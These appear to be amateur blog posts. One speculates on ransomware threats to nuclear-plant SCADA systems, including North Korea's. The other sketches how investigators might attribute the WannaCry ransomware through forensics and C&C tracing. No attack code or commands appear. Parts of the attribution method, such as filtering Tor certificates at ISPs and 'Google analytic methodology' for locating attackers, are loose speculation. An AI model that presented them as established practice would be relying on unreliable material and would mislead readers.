Below diagram is my imagination of the modern nuclear facility environment. The SCADA system pay a key role in nuclear power facility. Ransomeware have capabilities to suspend the services of this facilities. It doesn’t need to destroy anything but the services will be totally shut it down the services. We have seen the real example in UK health care services as a reference. I will stop written here. Should you have any queries, I will try my best to written more in future.

Supplement – The other side of the story on cyber attack (Electronic war between countries) – 13th June 2017

As said on above discussion topic, since it looks not interest to visitors on reflection of comments on feedback.  However there is something on my mind need to share.

North Korea President Kim’s intention show to the world of his governance power. He is in frequent to demonstrate his military power cause US government concerns his equalize of military power in the world. To be honest, it is hard to equal the military and economics power as of today. For instance China nearly become the 1st business economic leader. We all know United state is the leader in this moment. However their economic operation chain should have difficulties to do the 2nd round of transformation. Because some of their capital business and business economy contained made in China element.  Since North Korea on finance and business economy are weak. President Kim did such things seems not make sense. I did not visit North Korea however a lot of news on TV might speculate their current situation. I strongly believed that their nuclear facility might operation in 60’s fashion. The SCADA system not possibly supply by Siemens. But learn and develop a windows based SCADA system not difficult.  From information point of view, North Korea nuclear facilities might relies on window for Control Systems instead of Linux for control system.  And therefore Ransomware type attack can specifics shot the target. Meanwhile the business industry from North Korea all work with Microsoft OS  in daily life.

Below are the hints how to eliminate the risks issued by  SCADA system vendor. Any interest?

Process control vendors require:
1. A system with a minimal attack surface, so that biweekly or monthly patches are not required
2. A consistent programming interface that will not change every four to five years, requiring a complete rewrite of their software
3. An environment that can be quickly and safely “locked down” to reduce the risk from hacking
4. A system with limited network access, only through specific ports to reduce the risk of network based attacks
5. Support for priority-based multi-tasking, preferably a real-time operating system (RTOS) that supports hard real-time requirements
6. A robust ecosystem of utilities and tools to make development, installation, debugging, and maintenance as easy as it is on consumer systems.

End of this topic

Virus & Malware

Modern Sherlock Holmes – Find out the (malware & ransomware) perpetrators.

183 Comments

Preface:

A science concept guide human being to hypothesize boldly, to testify rigorously. It looks to me that this concept is principle but I believe that more terms can enrich our technology life. For example, carry the don’t care term during your development and thinking. That is even though it was unsucessful, you will receive knowledge. You will dig out more during this circumstances.

Remark: Since don’t care term also apply to boolean expression. May be you are think that it is a little bit side track, right. But we are in cyber world. In digital logic, a don’t-care term for a function is an input-sequence (a series of bits) for which the function output does not matter.

OK, we go to the subject matter today. How we imagine that Sherlock Holmes do a study on cybercrime. Find out the (malware & ransomware) perpetrator?

Perform investigation

From digital forensic point of view, the investigation will focus on the following objectives:

Capturing a Live RAM dump
Acquiring a Disk Image
Discovering and Analyzing Evidence
Creating Reports

Since I am not going to suggest that we engage a real exercises now. It is not a good idea without preventive control to execute this job. Run in rush without preparation thus contain inherent risk harm your machine and personal data. So we step back take a hot example (wanna cry) see whether can dig out more idea and information.

Observation Point 1 – Languages

Since we are not going to do a forensic investigation. We simply walk through example (wannacry) on language setup.  From language setup capabilities (see below), it looks that it cover the languages all around the world.

Criminal psychology

From criminal psychology point of view, it looks that the criminal not going to specify a specifics target. A high level point of view that they are looking for money. Fully compatible of language set benefits for their objective.

Observation Point 1.1 – Written language and grammar

From detection point of view, the written language and grammar can provides hints to detective see whether to dig out hints. This hints may speculate for the direction of the detection. For example: the fundamental limitation of mother tongue translation to other native language.

Weakness of this detection method:

Such detection might fool by criminal group and intend to interfere the direction.

Observation Point 2 – Malware written technique:

Some of the times, the written programming style and infection technique might provides hints to detective to the right direction. But a lot of time will interfere the direction of investigation. For example: Wannacry relies on NSA (DoublePulsar) back door software agent or SMB v1 vulnerability (see below picture) to execute the job task. From normal circumstance’s, bad guy will implant a backdoor to victim machine to fulfill the infiltration job task. Unfortunately the backdoor software (DoublePulsar) was given from NSA of their global surveillance program. Wannacry is a ransome software. In the sense that NSA might not be the perpetrator. As a result it interrupt the trace process. The investigator can’t follow the hints to predict who is the appropriate party to do this criminal job.

Observation Point 3 – Down to the grove, execute forensic investigation

Since above observation items might contain fundamental weakness. As a matter of fact, those items of evidences might become a relevant evidence. The fundamental theory by law of relevant evidence interpret that relevant part of evidence is logically connected to the fact it is intended to establish” (Blackwell, 2004).  However the investigator or detective most likely will prefer to execute forensic investigation to receive the digital and demonstrative evidence.

Technical limitation of the forensic investigation

We know that ransomware infection crisis like Wannacry victims suspended Health care services in United Kingdom. The major effect which harm to whole hospital services over there! Since healthcare services maintains compliance standard. It is possible to let the forensic investigator do the investigation (see below step).

1. Capturing a Live RAM dump
2. Acquiring a Disk Image
3. Discovering and Analyzing Evidence
4. Creating Report

However a technical limitation has been found on traditional digital forensic investigation criteria.

Few evidences will be lost once victim power off their machine.
Victim which have technical know how will erase some evidence
Audit log disable by default

Advanced technology enhance  the limitation on their investigation algorithm

Technology company note with alert of the technical weakness during forensics investigation. A preventive mechanism was build to avoid lost of critical data after system power off. The enhancement is that an software agent will be installed on the workstations. The software agent will collect the delta (data change) and then forward to the centralized repository in real time.

As we know, no design and solution is prefect. For this enhancement it is prefect to implement to enterprise or corporate environment. For workstation for personal usage it is difficult to implement. A drawback alert to the detective or government enforcement team that there is a technical limitation on personal devices (personal computer workstations, mobile computing devices and IoT devices).
Multi-angle detection architecture
Readers, if you can read this down to here, we might know the mentioned investigation mechanism are able to collect the following details.

(1) Memory dump, (2) disk image, (3) malware activities finger print, (4) virus and malware types, (5) C&C server public IP address and (6) malware dropper file.

Even through we received above informations on hand. However, it is hard to provide a comprehensive of evidence proof who is the perpetrator! For example, it is hard to collect the information details once workstation compromised by wannacry. As a matter of fact the whole disk has been encrypted. So, what’s the next step when investigator face this problem.

Refer to below picture, you might aware that point C (C&C server) and point D (victim compromised web server) are located in different regions. They are not in single operation. Even though Forensics investigator are able to decrypted the hard disk or collect the activities log from their SIEM device. The trace result sometimes mislead the location of the area. It is hard to provides a clear picture. In order to identify the root sources. A detection terminology so called multi angle detection algorithm will be assist investigator in such circumstances.

The concept idea is that investigator will summarize the following entities.

1. Total no. of C&C servers and their IP addresses
2. Total no. of Victims (compromised web server) and their IP address
3. Categorized the IP address and highlight the IP address region

Remark: As we know, hacker will relies on Tor network to hide himself in effective manner. Since it is hard to know their location status once their connectivities get inside to the onion network (Tor network).

4. Execute forensic investigation to the compromised server (Point D)

5. Find out the C&C server connectivity (Point C)

6. Sometimes law enforcement team not going to let hacker know they has been traced. The job might run on ISP side (Point B). For instance, they will lock down the appropriate tor certificate and filter the certificate Issuer and Subject ID patterns.

7. Since two important elements (tor cert and C&C server public IP address) are known. It is more easy to do the following to find out the attacker source IP address:

a.  Define correlation rule to find out the source IP address of the attacker.

b. Apply Google analytic methodology to figure out the attacker IP address.

8. The final action is activate the local police force to arrest the hacker.

Summary:

Regarding to above description it looks that it is not easy to lock down the hackers actual location. Heard that some security expert relies on English written skill or C&C server to predict the attacker source IP address. From technical point of view, it might contained distortion.